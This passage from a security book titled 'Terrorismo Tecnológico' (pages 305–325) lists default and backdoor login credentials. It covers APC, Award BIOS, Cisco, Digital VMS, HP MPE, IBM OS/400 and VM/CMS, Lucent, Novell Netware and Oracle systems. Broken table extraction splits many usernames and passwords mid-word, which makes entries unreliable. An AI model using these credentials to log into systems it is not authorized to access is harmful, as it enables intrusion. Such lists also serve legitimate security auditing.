APC Call-UPS AP Console n/a serial Admin
960 number
8 of the
Call-
UPS
APC Share- AP Console n/a serial Admin
UPS 920 number
7 of the
Share-
Terrorismo Tecnológico 305
Aprenda Para Sobreviver

UPS
APC Web/SNM AP Multi apc apc Admin
P 960
Managem 6
ent Card
APC Powerchut 4.x Console POWERCHUT APC Admin
e Plus for E
Net
war
e
3.x/
4.x
Ascend Router Telnet n/a ascend Admin
AST PC BIOS Console n/a SnuFG5 Admin
Attachm Attachmat Console n/a PASSW Admin
ate e ORD
Gateway
AT&T 3B2 Console n/a mcp Admin
Firmware
Audioac MPEG Telnet n/a telos Admin
tive Realtime
Encoders
Autodes Autocad Multi autocad autocad User
k
AWARD PC BIOS Console n/a Award Admin
AWARD PC BIOS Console n/a AWARD Admin
_SW
AWARD PC BIOS Console n/a SW_A Admin
WARD
AWARD PC BIOS Console n/a lkwpeter Admin
AWARD PC BIOS Console n/a LKWPE Admin
TER
AWARD PC BIOS Console n/a ?award Admin
AWARD PC BIOS Console n/a 256256 Admin
AWARD PC BIOS Console n/a admin Admin
AWARD PC BIOS Console n/a alfarom Admin
e
AWARD PC BIOS Console n/a aLLy Admin
AWARD PC BIOS Console n/a aPAf Admin
AWARD PC BIOS Console n/a award Admin
AWARD PC BIOS Console n/a AWARD Admin
SW
AWARD PC BIOS Console n/a awkwar Admin
d
AWARD PC BIOS Console n/a BIOS Admin
AWARD PC BIOS Console n/a biosstar Admin
AWARD PC BIOS Console n/a biostar Admin
AWARD PC BIOS Console n/a CONCA Admin
T
AWARD PC BIOS Console n/a condo Admin
Terrorismo Tecnológico 306
Aprenda Para Sobreviver

AWARD PC BIOS Console n/a CONDO Admin


AWARD PC BIOS Console n/a CONDO Admin
,
AWARD PC BIOS Console n/a HELGA- Admin
S
AWARD PC BIOS Console n/a HEWIT Admin
T RAND
AWARD PC BIOS Console n/a HLT Admin
AWARD PC BIOS Console n/a j322 Admin
AWARD PC BIOS Console n/a j64 Admin
AWARD PC BIOS Console n/a lkw Admin
peter
AWARD PC BIOS Console n/a lkwpeter Admin
AWARD PC BIOS Console n/a PASSW Admin
ORD
AWARD PC BIOS Console n/a SER Admin
AWARD PC BIOS Console n/a setup Admin
AWARD PC BIOS Console n/a SKY_F Admin
OX
AWARD PC BIOS Console n/a SWITC Admin
HES_S
W
AWARD PC BIOS Console n/a Sxyz Admin
AWARD PC BIOS Console n/a SZYX Admin
AWARD PC BIOS Console n/a t0ch20x Admin
AWARD PC BIOS Console n/a t0ch88 Admin
AWARD PC BIOS Console n/a TTPTH Admin
A
AWARD PC BIOS Console n/a TzqF Admin
AWARD PC BIOS Console n/a wodj Admin
AWARD PC BIOS Console n/a zbaaac Admin
a
Axis NETCAM 200 Telnet root pass Admin
/24
0
Axis Printserve 540 Multi root pass Admin
r /54
0+
Bay Router Telnet Manager (none) Admin
Network
s
Bay Router Telnet User (none) User
Network
s
Bay SuperStac Telnet security security Admin
Network k II
s
Bay Switch 350 Telnet n/a NetICs Admin
Network T
s
Bintec Bianka Multi admin bintec Admin
Terrorismo Tecnológico 307
Aprenda Para Sobreviver

Routers
Biostar PC BIOS Console n/a Biostar Admin
Biostar PC BIOS Console n/a Q54arw Admin
ms
Breezec Breezeco 4.4. n/a Helpdes Admin
om m x k
Adapters
Breezec Breezeco 4.x n/a Super Admin
om m
Adapters
Breezec Breezeco 3.x n/a Master Admin
om m
Adapters
Breezec Breezeco 2.x n/a laflaf Admin
om m
Adapters
Cabletro Netgear netman (none) Admin
n modem/router
and SSR
Cabletro routers & (none) (none)
n switches
Cayman Cayman DSL n/a (none) Admin
CGI Poll It v HTTP n/a protecti User/Adm
World 2. on in over
0 package
Cisco CiscoWorks 2000 admin cisco Admin
Cisco CiscoWorks 2000 guest (none) User
Cisco ConfigMaker cmaker cmaker Admin
Cisco IOS Multi cisco cisco
Cisco IOS Multi enable cisco
Cisco IOS 2 Multi n/a c
6
0
0
s
é
ri
e
s
Cisco IOS Multi n/a cc
Cisco IOS Multi n/a cisco
Cisco IOS Multi n/a Cisco
router
Cisco IOS SNMP public secret Read
ReadOnly
access
Cisco IOS SNMP private secret Read/Writ
ReadWrite e
access
Cisco IOS Multi ripeop (no pw)
Cisco PIX Telnet n/a cisco UID = pix
Cisco- Arrowpoint admin system Admin
Terrorismo Tecnológico 308
Aprenda Para Sobreviver

Arrowpo
int
Compaq Insight Manager administrator administ Admin
rator
Compaq Insight Manager anonymous (none) User
Compaq Insight Manager operator operator
Compaq Insight Manager user public User
Compaq PC BIOS Consol n/a Compa Admin
e q
Compua Cproxy Server A Multi administrator asecret Admin
lynx ll
V
e
rs
io
n
s
Compua Cmail Server A Multi administrator asecret Admin
lynx ll
V
e
rs
io
n
s
Compua SCM A Multi administrator asecret Admin
lynx ll
V
e
rs
io
n
s
Concord PC BIOS n/a last Admin
Crystalvi OutsideView 32 Crystal Admin
ew
CTX PC BIOS Consol n/a CTX_12 Admin
Internati e 3
onal
CyberMa PC BIOS Consol n/a Congre Admin
x e ss
Daewoo PC BIOS Consol n/a Daewuu Admin
e
Dallas TINI embedded < Telnet root tini Admin
Semicon JAVA Module =
ductors 1.
0
Data AOS/VS Multi operator operator Admin
General
Data AOS/VS Multi op op Admin
General
Data AOS/VS Multi op operator Admin
General
Datacom BSASX/101 n/a letmein Admin
Datacom NSBrowse Multi sysadm sysadm Admin
Terrorismo Tecnológico 309
Aprenda Para Sobreviver

Daytek PC BIOS Consol n/a Daytec Admin


e
Debian Linux LILO 2. Consol n/a tatercou Admin
Default 2 e nter200
0
Dell PC BIOS Consol n/a Dell Admin
e
Develco Orbitor Default n/a BRIDG Admin
n Console E
Develco Orbitor Default n/a passwor Admin
n Console d
Dictaph ProLog NETOP (none)
one
Dictaph ProLog NETWORK NETWO
one RK
Dictaph ProLog PBX PBX
one
Digicorp Viper Telnet n/a BRIDG Admin
E
Digicorp Viper Telnet n/a passwor Admin
d
Digital DEC-10 Multi 1 syslib Admin
Equipme
nt
Digital DEC-10 Multi 1 operator Admin
Equipme
nt
Digital DEC-10 Multi 1 manage Admin
Equipme r
nt
Digital DEC-10 Multi 2 maintai Admin
Equipme n
nt
Digital DEC-10 Multi 2 syslib Admin
Equipme
nt
Digital DEC-10 Multi 2 manage Admin
Equipme r
nt
Digital DEC-10 Multi 2 operator Admin
Equipme
nt
Digital DEC-10 Multi 30 games User
Equipme
nt
Digital DEC-10 Multi 5 games User
Equipme
nt
Digital DEC-10 Multi 7 maintai User
Equipme n
nt
Digital DecServer Multi n/a ACCES Admin
Equipme S
nt
Digital DecServer Multi n/a SYSTE Admin
Equipme M
nt
Terrorismo Tecnológico 310
Aprenda Para Sobreviver

Digital IRIS Multi accounting accounti Admin


Equipme ng
nt
Digital IRIS Multi boss boss Admin
Equipme
nt
Digital IRIS Multi demo demo User
Equipme
nt
Digital IRIS Multi manager manage Admin
Equipme r
nt
Digital IRIS Multi PDP11 PDP11 User
Equipme
nt
Digital IRIS Multi PDP8 PDP8 User
Equipme
nt
Digital IRIS Multi software softwar User
Equipme e
nt
Digital PC BIOS Consol n/a komprie Admin
Equipme e
nt
Digital RSX Multi 1,1 SYSTE Admin
Equipme M
nt
Digital RSX Multi BATCH BATCH User
Equipme
nt
Digital RSX Multi SYSTEM MANAG Admin
Equipme ER
nt
Digital RSX Multi SYSTEM SYSTE Admin
Equipme M
nt
Digital RSX Multi USER USER User
Equipme
nt
Digital Terminal Server Port n/a access User
Equipme 7000
nt
Digital Terminal Server Port n/a system Admin
Equipme 7000
nt
Digital VMS Multi ALLIN1 ALLIN1
Equipme
nt
Digital VMS Multi ALLIN1MAIL ALLIN1
Equipme MAIL
nt
Digital VMS Multi ALLINONE ALLINO
Equipme NE
nt
Digital VMS Multi BACKUP BACKU
Equipme P
nt
Terrorismo Tecnológico 311
Aprenda Para Sobreviver

Digital VMS Multi DCL DCL


Equipme
nt
Digital VMS Multi DECMAIL DECMA
Equipme IL
nt
Digital VMS Multi DECNET DECNE
Equipme T
nt
Digital VMS Multi DECNET NONPR
Equipme IV
nt
Digital VMS Multi DECNET DECNE
Equipme T
nt
Digital VMS Multi DEFAULT USER
Equipme
nt
Digital VMS Multi DEFAULT DEFAU
Equipme LT
nt
Digital VMS Multi DEMO DEMO
Equipme
nt
Digital VMS Multi FIELD FIELD
Equipme
nt
Digital VMS Multi FIELD SERVIC
Equipme E
nt
Digital VMS Multi FIELD TEST
Equipme
nt
Digital VMS Multi FIELD DIGITA
Equipme L
nt
Digital VMS Multi GUEST GUEST
Equipme
nt
Digital VMS Multi HELP HELP
Equipme
nt
Digital VMS Multi HELPDESK HELPD
Equipme ESK
nt
Digital VMS Multi HOST HOST
Equipme
nt
Digital VMS Multi HOST HOST
Equipme
nt
Digital VMS Multi INFO INFO
Equipme
nt
Digital VMS Multi INGRES INGRE
Equipme S
nt
Terrorismo Tecnológico 312
Aprenda Para Sobreviver

Digital VMS Multi LINK LINK


Equipme
nt
Digital VMS Multi MAILER MAILER
Equipme
nt
Digital VMS Multi MBMANAGER MBMAN
Equipme AGER
nt
Digital VMS Multi MBWATCH MBWAT
Equipme CH
nt
Digital VMS Multi NETCON NETCO
Equipme N
nt
Digital VMS Multi NETMGR NETMG
Equipme R
nt
Digital VMS Multi NETNONPRIV NETNO
Equipme NPRIV
nt
Digital VMS Multi NETPRIV NETPRI
Equipme V
nt
Digital VMS Multi NETSERVER NETSE
Equipme RVER
nt
Digital VMS Multi NETSERVER NETSE
Equipme RVER
nt
Digital VMS Multi NETWORK NETWO
Equipme RK
nt
Digital VMS Multi NEWINGRES NEWIN
Equipme GRES
nt
Digital VMS Multi NEWS NEWS
Equipme
nt
Digital VMS Multi OPERVAX OPERV
Equipme AX
nt
Digital VMS Multi POSTMASTE POSTM
Equipme R ASTER
nt
Digital VMS Multi PRIV PRIV
Equipme
nt
Digital VMS Multi REPORT REPOR
Equipme T
nt
Digital VMS Multi RJE RJE
Equipme
nt
Digital VMS Multi STUDENT STUDE
Equipme NT
nt
Terrorismo Tecnológico 313
Aprenda Para Sobreviver

Digital VMS Multi SYS SYS


Equipme
nt
Digital VMS Multi SYSMAINT SYSMA
Equipme INT
nt
Digital VMS Multi SYSMAINT SERVIC
Equipme E
nt
Digital VMS Multi SYSMAINT DIGITA
Equipme L
nt
Digital VMS Multi SYSTEM SYSTE
Equipme M
nt
Digital VMS Multi SYSTEM MANAG
Equipme ER
nt
Digital VMS Multi SYSTEM OPERA
Equipme TOR
nt
Digital VMS Multi SYSTEM SYSLIB
Equipme
nt
Digital VMS Multi SYSTEST UETP
Equipme
nt
Digital VMS Multi SYSTEST_CLI SYSTE
Equipme G ST_CLI
nt G
Digital VMS Multi SYSTEST_CLI SYSTE
Equipme G ST
nt
Digital VMS Multi TELEDEMO TELED
Equipme EMO
nt
Digital VMS Multi TEST TEST
Equipme
nt
Digital VMS Multi UETP UETP
Equipme
nt
Digital VMS Multi USER PASSW
Equipme ORD
nt
Digital VMS Multi USERP USERP
Equipme
nt
Digital VMS Multi VAX VAX
Equipme
nt
Digital VMS Multi VMS VMS
Equipme
nt
D-Link hubs/switches Telnet D-Link D-Link
Dynix Dynix Multi circ <social User
Library sec #>
Terrorismo Tecnológico 314
Aprenda Para Sobreviver

Systems
Dynix Dynix Multi LIBRARY (none) User
Library
Systems
Dynix Dynix Multi SETUP (none) Admin
Library
Systems
Efficient Speedstream Telnet n/a admin Admin
DSL
Elsa LANCom Office 8 Telnet n/a cisco Admin
ISDN Router 0
0/
1
0
0
0/
1
1
0
0
Elsa LANCom Office 8 Telnet n/a (none) Admin
ISDN Router 0
0/
1
0
0
0/
1
1
0
0
Enox PC BIOS Consol n/a xo11nE Admin
e
Epox PC BIOS Consol n/a central Admin
e
Ericsson Ericsson Acc netman netman
Flowpoi DSL 2 Telnet admin admin Admin
nt 0
0
0
Flowpoi DSL Telnet n/a passwor Admin
nt d
Flowpoi Flowpoint/2000 Telnet n/a (none) Admin
nt ADSL
Freetech PC BIOS Consol n/a Posterie Admin
e
Galactic Major BBS Multi Sysop Sysop Admin
omm
GuardO Restrictor Multi n/a guardon Admin
ne e
GuardO BizGuard Multi n.a guardon Admin
ne e
glFtpD glFtpD al Consol glftpd glftpd Admin
l e
Hewlett- HP 2000/3000 Multi ADVMAIL HPOFFI
Packard MPE/xx CE,DAT
A
Terrorismo Tecnológico 315
Aprenda Para Sobreviver

Hewlett- HP 2000/3000 Multi ADVMAIL HP


Packard MPE/xx
Hewlett- HP 2000/3000 Multi FIELD SUPPO
Packard MPE/xx RT
Hewlett- HP 2000/3000 Multi FIELD MGR
Packard MPE/xx
Hewlett- HP 2000/3000 Multi FIELD SERVIC
Packard MPE/xx E
Hewlett- HP 2000/3000 Multi FIELD MANAG
Packard MPE/xx ER
Hewlett- HP 2000/3000 Multi FIELD HPP187
Packard MPE/xx ,SYS
Hewlett- HP 2000/3000 Multi FIELD LOTUS
Packard MPE/xx
Hewlett- HP 2000/3000 Multi FIELD HPWO
Packard MPE/xx RD,PU
B
Hewlett- HP 2000/3000 Multi FIELD HPONL
Packard MPE/xx Y
Hewlett- HP 2000/3000 Multi HELLO MANAG
Packard MPE/xx ER.SYS
Hewlett- HP 2000/3000 Multi HELLO MGR.S
Packard MPE/xx YS
Hewlett- HP 2000/3000 Multi HELLO FIELD.
Packard MPE/xx SUPPO
RT
Hewlett- HP 2000/3000 Multi HELLO OP.OP
Packard MPE/xx ERATO
R
Hewlett- HP 2000/3000 Multi MAIL MAIL
Packard MPE/xx
Hewlett- HP 2000/3000 Multi MAIL REMOT
Packard MPE/xx E
Hewlett- HP 2000/3000 Multi MAIL TELES
Packard MPE/xx UP
Hewlett- HP 2000/3000 Multi MAIL HPOFFI
Packard MPE/xx CE
Hewlett- HP 2000/3000 Multi MAIL MPE
Packard MPE/xx
Hewlett- HP 2000/3000 Multi MANAGER TCH
Packard MPE/xx
Hewlett- HP 2000/3000 Multi MANAGER SYS
Packard MPE/xx
Hewlett- HP 2000/3000 Multi MANAGER SECUR
Packard MPE/xx ITY
Hewlett- HP 2000/3000 Multi MANAGER ITF3000
Packard MPE/xx
Hewlett- HP 2000/3000 Multi MANAGER HPOFFI
Packard MPE/xx CE
Hewlett- HP 2000/3000 Multi MANAGER COGN
Packard MPE/xx OS
Hewlett- HP 2000/3000 Multi MANAGER TELES
Packard MPE/xx UP
Hewlett- HP 2000/3000 Multi MGE VESOF
Packard MPE/xx T
Hewlett- HP 2000/3000 Multi MGE VESOF
Terrorismo Tecnológico 316
Aprenda Para Sobreviver

Packard MPE/xx T
Hewlett- HP 2000/3000 Multi MGR SYS
Packard MPE/xx
Hewlett- HP 2000/3000 Multi MGR CAROLI
Packard MPE/xx AN
Hewlett- HP 2000/3000 Multi MGR VESOF
Packard MPE/xx T
Hewlett- HP 2000/3000 Multi MGR XLSER
Packard MPE/xx VER
Hewlett- HP 2000/3000 Multi MGR SECUR
Packard MPE/xx ITY
Hewlett- HP 2000/3000 Multi MGR TELES
Packard MPE/xx UP
Hewlett- HP 2000/3000 Multi MGR HPDES
Packard MPE/xx K
Hewlett- HP 2000/3000 Multi MGR CCC
Packard MPE/xx
Hewlett- HP 2000/3000 Multi MGR CNAS
Packard MPE/xx
Hewlett- HP 2000/3000 Multi MGR WORD
Packard MPE/xx
Hewlett- HP 2000/3000 Multi MGR COGN
Packard MPE/xx OS
Hewlett- HP 2000/3000 Multi MGR ROBEL
Packard MPE/xx LE
Hewlett- HP 2000/3000 Multi MGR HPOFFI
Packard MPE/xx CE
Hewlett- HP 2000/3000 Multi MGR HPONL
Packard MPE/xx Y
Hewlett- HP 2000/3000 Multi MGR HPP187
Packard MPE/xx
Hewlett- HP 2000/3000 Multi MGR HPP189
Packard MPE/xx
Hewlett- HP 2000/3000 Multi MGR HPP196
Packard MPE/xx
Hewlett- HP 2000/3000 Multi MGR INTX3
Packard MPE/xx
Hewlett- HP 2000/3000 Multi MGR ITF3000
Packard MPE/xx
Hewlett- HP 2000/3000 Multi MGR NETBA
Packard MPE/xx SE
Hewlett- HP 2000/3000 Multi MGR REGO
Packard MPE/xx
Hewlett- HP 2000/3000 Multi MGR RJE
Packard MPE/xx
Hewlett- HP 2000/3000 Multi MGR CONV
Packard MPE/xx
Hewlett- HP 2000/3000 Multi OPERATOR SYS
Packard MPE/xx
Hewlett- HP 2000/3000 Multi OPERATOR DISC
Packard MPE/xx
Hewlett- HP 2000/3000 Multi OPERATOR SYSTE
Packard MPE/xx M
Hewlett- HP 2000/3000 Multi OPERATOR SUPPO
Packard MPE/xx RT
Terrorismo Tecnológico 317
Aprenda Para Sobreviver

Hewlett- HP 2000/3000 Multi OPERATOR COGN


Packard MPE/xx OS
Hewlett- HP 2000/3000 Multi PCUSER SYS
Packard MPE/xx
Hewlett- HP 2000/3000 Multi RSBCMON SYS
Packard MPE/xx
Hewlett- HP 2000/3000 Multi SPOOLMAN HPOFFI
Packard MPE/xx CE
Hewlett- HP 2000/3000 Multi WP HPOFFI
Packard MPE/xx CE
Hewlett- Vectra Consol n/a hewlpac Admin
Packard e k
IBM AIX Multi guest (none) User
IBM AIX Multi guest guest User
IBM Ascend OEM Telnet n/a ascend Admin
Routers
IBM OS/400 Multi 11111111 111111
11
IBM OS/400 Multi 22222222 222222
22
IBM OS/400 Multi ibm passwor
d
IBM OS/400 Multi ibm 2222
IBM OS/400 Multi ibm service
IBM OS/400 Multi qpgmr qpgmr
IBM OS/400 Multi qsecofr qsecofr
IBM OS/400 Multi qsecofr 111111
11
IBM OS/400 Multi qsecofr 222222
22
IBM OS/400 Multi qserv qserv
IBM OS/400 Multi qsrv qsrv
IBM OS/400 Multi qsrvbas qsrvbas
IBM OS/400 Multi qsvr qsvr
IBM OS/400 Multi qsvr ibmcel
IBM OS/400 Multi qsysopr qsysopr
IBM OS/400 Multi quser quser
IBM OS/400 Multi user USERP
IBM OS/400 Multi secofr secofr
IBM OS/400 Multi sedacm secacm
IBM OS/400 Multi sysopr sysopr
IBM PC BIOS Consol n/a IBM Admin
e
IBM PC BIOS Consol n/a MBIU0 Admin
e
IBM PC BIOS Consol n/a sertafu Admin
e
IBM POS CMOS Consol ESSEX
e
Terrorismo Tecnológico 318
Aprenda Para Sobreviver

IBM POS CMOS Consol IPC


e
IBM VM/CMS Multi $ALOC$ (none)
IBM VM/CMS Multi ADMIN (none)
IBM VM/CMS Multi AP2SVP (none)
IBM VM/CMS Multi APL2PP (none)
IBM VM/CMS Multi AUTOLOG1 (none)
IBM VM/CMS Multi BATCH (none)
IBM VM/CMS Multi BATCH1 (none)
IBM VM/CMS Multi BATCH2 (none)
IBM VM/CMS Multi CCC (none)
IBM VM/CMS Multi CMSBATCH (none)
IBM VM/CMS Multi CMSUSER (none)
IBM VM/CMS Multi CPNUC (none)
IBM VM/CMS Multi CPRM (none)
IBM VM/CMS Multi CSPUSER (none)
IBM VM/CMS Multi CVIEW (none)
IBM VM/CMS Multi DATAMOVE (none)
IBM VM/CMS Multi DEMO1 (none)
IBM VM/CMS Multi DEMO2 (none)
IBM VM/CMS Multi DEMO3 (none)
IBM VM/CMS Multi DEMO4 (none)
IBM VM/CMS Multi DIRECT (none)
IBM VM/CMS Multi DIRMAINT (none)
IBM VM/CMS Multi DISKCNT (none)
IBM VM/CMS Multi EREP (none)
IBM VM/CMS Multi FSFADMIN (none)
IBM VM/CMS Multi FSFTASK1 (none)
IBM VM/CMS Multi FSFTASK2 (none)
IBM VM/CMS Multi GCS (none)
IBM VM/CMS Multi IDMS (none)
IBM VM/CMS Multi IDMSSE (none)
IBM VM/CMS Multi IIPS (none)
IBM VM/CMS Multi IPFSERV (none)
IBM VM/CMS Multi ISPVM (none)
IBM VM/CMS Multi IVPM1 (none)
IBM VM/CMS Multi IVPM2 (none)
IBM VM/CMS Multi MAINT (none)
IBM VM/CMS Multi MOESERV (none)
IBM VM/CMS Multi NEVIEW (none)
Terrorismo Tecnológico 319
Aprenda Para Sobreviver

IBM VM/CMS Multi OLTSEP (none)


IBM VM/CMS Multi OP1 (none)
IBM VM/CMS Multi OPERATNS (none)
IBM VM/CMS Multi OPERATOR (none)
IBM VM/CMS Multi PDMREMI (none)
IBM VM/CMS Multi PENG (none)
IBM VM/CMS Multi PROCAL (none)
IBM VM/CMS Multi PRODBM (none)
IBM VM/CMS Multi PROMAIL (none)
IBM VM/CMS Multi PSFMAINT (none)
IBM VM/CMS Multi PVM (none)
IBM VM/CMS Multi RDM470 (none)
IBM VM/CMS Multi ROUTER (none)
IBM VM/CMS Multi RSCS (none)
IBM VM/CMS Multi RSCSV2 (none)
IBM VM/CMS Multi SAVSYS (none)
IBM VM/CMS Multi SFCMI (none)
IBM VM/CMS Multi SFCNTRL (none)
IBM VM/CMS Multi SMART (none)
IBM VM/CMS Multi SQLDBA (none)
IBM VM/CMS Multi SQLUSER (none)
IBM VM/CMS Multi SYSADMIN (none)
IBM VM/CMS Multi SYSCKP (none)
IBM VM/CMS Multi SYSDUMP1 (none)
IBM VM/CMS Multi SYSERR (none)
IBM VM/CMS Multi SYSWRM (none)
IBM VM/CMS Multi TDISK (none)
IBM VM/CMS Multi TEMP (none)
IBM VM/CMS Multi TSAFVM (none)
IBM VM/CMS Multi VASTEST (none)
IBM VM/CMS Multi VM3812 (none)
IBM VM/CMS Multi VMARCH (none)
IBM VM/CMS Multi VMASMON (none)
IBM VM/CMS Multi VMASSYS (none)
IBM VM/CMS Multi VMBACKUP (none)
IBM VM/CMS Multi VMBSYSAD (none)
IBM VM/CMS Multi VMMAP (none)
IBM VM/CMS Multi VMTAPE (none)
IBM VM/CMS Multi VMTLIBR (none)
Terrorismo Tecnológico 320
Aprenda Para Sobreviver

IBM VM/CMS Multi VMUTIL (none)


IBM VM/CMS Multi VSEIPO (none)
IBM VM/CMS Multi VSEMAINT (none)
IBM VM/CMS Multi VSEMAN (none)
IBM VM/CMS Multi VTAM (none)
IBM VM/CMS Multi VTAMUSER (none)
Intel Shiva Multi Guest (none) User
Intel Shiva Multi root (none) Admin
Intel Shiva Lanrovers Multi root (none) Admin
Intel LanRover < Multi n/a isolation Admin
6.
VPN 0
Gateway
Intel LanRover 6. Multi n/a shiva Admin
0
VPN >
Gateway
Interbas Interbase A Multi SYSDBA masterk Admin
e Database Server ll ey
IRC IRC Daemon IRC n/a FOOBA Acess
R
Iwill PC BIOS Consol n/a iwill Admin
e
JD WorldVision/One A TCP JDE JDE Admin/SE
Edwards World ll( 1964 COFR
?
)
Jetform Jetform Design HTTP Jetform (none) Admin
JetWay PC BIOS Consol n/a spooml Admin
e
Joss PC BIOS Consol n/a 57gbzb Admin
Technol e
ogy
Joss PC BIOS Consol n/a technol Admin
Technol e gi
ogy
Lantroni Lantronics TCP n/a access Admin
cs Terminal Server 7000
Lantroni Lantronics TCP n/a system Admin
cs Terminal Server 7000
Leading PC BIOS Consol n/a MASTE Admin
Edge e R
Linksys DSL Telnet n/a admin Admin
Linux Slackware Multi gonzo (none) User
Linux Slackware Multi satan (none) User
Linux Slackware Multi snake (none) User
Linux UCLinux for Multi root uClinux Admin
UCSIMM
Livingst IRX Router Telnet !root (none)
on
Terrorismo Tecnológico 321
Aprenda Para Sobreviver

Livingst Livingston Telnet !root (none)


on Portmaster 3
Livingst Officerouter Telnet !root (none)
on
Lucent System 75 Multi bciim bciimpw
Lucent System 75 Multi bcim bcimpw
Lucent System 75 Multi bcms bcmspw
Lucent System 75 Multi bcms bcmspw
Lucent System 75 Multi bcnas bcnasp
w
Lucent System 75 Multi blue bluepw
Lucent System 75 Multi browse browse
pw
Lucent System 75 Multi browse looker
Lucent System 75 Multi craft craft
Lucent System 75 Multi craft craftpw
Lucent System 75 Multi craft craftpw
Lucent System 75 Multi cust custpw
Lucent System 75 Multi enquiry enquiry
pw
Lucent System 75 Multi field support
Lucent System 75 Multi inads indspw
Lucent System 75 Multi inads indspw
Lucent System 75 Multi inads inads
Lucent System 75 Multi init initpw
Lucent System 75 Multi locate locatep
w
Lucent System 75 Multi maint maintpw
Lucent System 75 Multi maint rwmaint
Lucent System 75 Multi nms nmspw
Lucent System 75 Multi pw pwpw
Lucent System 75 Multi rcust rcustpw
Lucent System 75 Multi support support
pw
Lucent System 75 Multi sysadm sysadm
pw
Lucent System 75 Multi sysadm admpw
Lucent System 75 Multi sysadm syspw
Lucent System 75 Multi tech field
M PC BIOS Consol n/a mMmM Admin
Technol e
ogy
MachSp PC BIOS Consol n/a sp99dd Admin
eed e
Magic- PC BIOS Consol n/a prost Admin
Pro e
Terrorismo Tecnológico 322
Aprenda Para Sobreviver

Megasta PC BIOS Consol n/a star Admin


r e
Mentec Micro/RSX Multi MICRO RSX Admin
Micron PC BIOS Consol n/a sldkj754 Admin
e
Micron PC BIOS Consol n/a xyzall Admin
e
Micronic PC BIOS Consol n/a dn_04rj Admin
s e c
Microple Print Server Telnet root root Admin
x
Microsof Windows NT Multi (null) (none) User
t
Microsof Windows NT Multi Administrator Adminis Admin
t trator
Microsof Windows NT Multi Administrator (none) Admin
t
Microsof Windows NT Multi Guest Guest User
t
Microsof Windows NT Multi Guest (none) User
t
Microsof Windows NT Multi IS_$hostname (same) User
t
Microsof Windows NT Multi User User User
t
Mintel Mintel PBX n/a SYSTE Admin
M
Motorola Cablerouter Telnet cablecom router Admin
MySQL MySQL all root (none) Admin
versio
ns
NCR NCR UNIX Multi ncrm ncrm Admin
NetGene NetAnalysis Web HTTP naadmin naadmi Admin
sis Reporting n
Netopia Netopia 7100 Telnet (none) (none) Admin
Netopia Netopia 9500 Telnet netopia netopia Admin
NetworkI ICECap Manager 2. 8081 iceman (none) Admin
CE 0.
2
2
<
NeXT NeXTStep Multi me (none) User
NeXT NeXTStep Multi root NeXT Admin
NeXT NeXTStep Multi signa signa User
Nimble PC BIOS Consol n/a xdfk987 Admin
e 4t3
Nortel Accelar Multi l2 l2 Layer 2
(Passport) 1000 Read
séries routing Write
switches
Nortel Accelar Multi l3 l3 Layer 3
(Passport) 1000 (and layer
séries routing 2) Read
Terrorismo Tecnológico 323
Aprenda Para Sobreviver

switches Write
Nortel Accelar Multi ro ro Read
(Passport) 1000 Only
séries routing
switches
Nortel Accelar Multi rw rw Read
(Passport) 1000 Write
séries routing
switches
Nortel Accelar Multi rwa rwa Read
(Passport) 1000 Write All
séries routing
switches
Nortel Extranet Multi admin setup Admin
Switches
Nortel Meridian PBX Serial login 0000
Nortel Meridian PBX Serial spcl 0000
Nortel Remote Office Client admin root Admin
9150
Novell Netware Multi ADMIN ADMIN
Novell Netware Multi ADMIN (none)
Novell Netware Multi ARCHIVIST (none)
Novell Netware Multi ARCHIVIST ARCHI
VIST
Novell Netware Multi BACKUP (none)
Novell Netware Multi BACKUP BACKU
P
Novell Netware Multi CHEY_ARCH CHEY_ARCHSVR
SVR
Novell Netware Multi CHEY_ARCH (none)
SVR
Novell Netware Multi FAX FAX
Novell Netware Multi FAX (none)
Novell Netware Multi FAXUSER FAXUSE
R
Novell Netware Multi FAXUSER (none)
Novell Netware Multi FAXWORKS (none)
Novell Netware Multi FAXWORKS FAXWO
RKS
Novell Netware Multi GATEWAY GATEW
AY
Novell Netware Multi GATEWAY GATEW
AY
Novell Netware Multi GATEWAY (none)
Novell Netware Multi GUEST TSEUG
Novell Netware Multi GUEST GUEST
GUEST
Novell Netware Multi GUEST GUEST
GUE
Novell Netware Multi GUEST GUEST
Terrorismo Tecnológico 324
Aprenda Para Sobreviver

Novell Netware Multi GUEST (none)


Novell Netware Multi HPLASER (none)
Novell Netware Multi HPLASER HPLASE
R
Novell Netware Multi LASER (none)
Novell Netware Multi LASER LASER
Novell Netware Multi LASERWRITE LASER
R WRITER
Novell Netware Multi LASERWRITE (none)
R
Novell Netware Multi MAIL (none)
Novell Netware Multi MAIL MAIL
Novell Netware Multi POST (none)
Novell Netware Multi POST POST
Novell Netware Multi PRINT (none)
Novell Netware Multi PRINT PRINT
Novell Netware Multi PRINTER (none)
Novell Netware Multi PRINTER PRINTE
R
Novell Netware Multi ROOT (none)
Novell Netware Multi ROOT ROOT
Novell Netware Multi ROUTER (none)
Novell Netware Multi SABRE (none)
Novell Netware Multi SUPERVISOR NETFRA
ME
Novell Netware Multi SUPERVISOR NFI
Novell Netware Multi SUPERVISOR NF
Novell Netware Multi SUPERVISOR HARRIS
Novell Netware Multi SUPERVISOR SUPER
VISOR
Novell Netware Multi SUPERVISOR (none)
Novell Netware Multi SUPERVISOR SYSTE
M
Novell Netware Multi TEST TEST
Novell Netware Multi TEST (none)
Novell Netware Multi USER_TEMPL (none)
ATE
Novell Netware Multi USER_TEMPL USER_TEMPLATE
ATE
Novell Netware Multi WANGTEK (none)
Novell Netware Multi WANGTEK WANGT
EK
Novell Netware Multi WINDOWS_P WINDOWS_PASSTH
ASSTHRU RU
Novell Netware Multi WINDOWS_P (none)
ASSTHRU
Novell Netware Multi WINSABRE SABRE
Terrorismo Tecnológico 325
Aprenda Para Sobreviver

Novell Netware Multi WINSABRE WINSAB


RE
Nurit PC BIOS Consol $system (none) Admin
e
Oracle Oracle RDBMS 7, Multi ADAMS WOOD
8
Oracle Oracle RDBMS 7, Multi APPLSYS APPLSY
8 S
Oracle Oracle RDBMS 7, Multi APPS APPS
8
Oracle Oracle RDBMS 7, Multi AURORA@OR INVALID
8 B@UNAUTHE
NTICATED
Oracle Oracle RDBMS 7, Multi BLAKE PAPER
8
Oracle Oracle RDBMS 7, Multi CLARK CLOTH
8
Oracle Oracle RDBMS 7, Multi CTXDEMO CTXDE
8 MO
Oracle Oracle RDBMS 7, Multi CTXSYS CTXSYS
8
Oracle Oracle RDBMS 7, Multi DBSNMP DBSNM RESOU
8 P RCE and
CONNE
CT roles
Oracle Oracle RDBMS 7, Multi DEMO DEMO
8
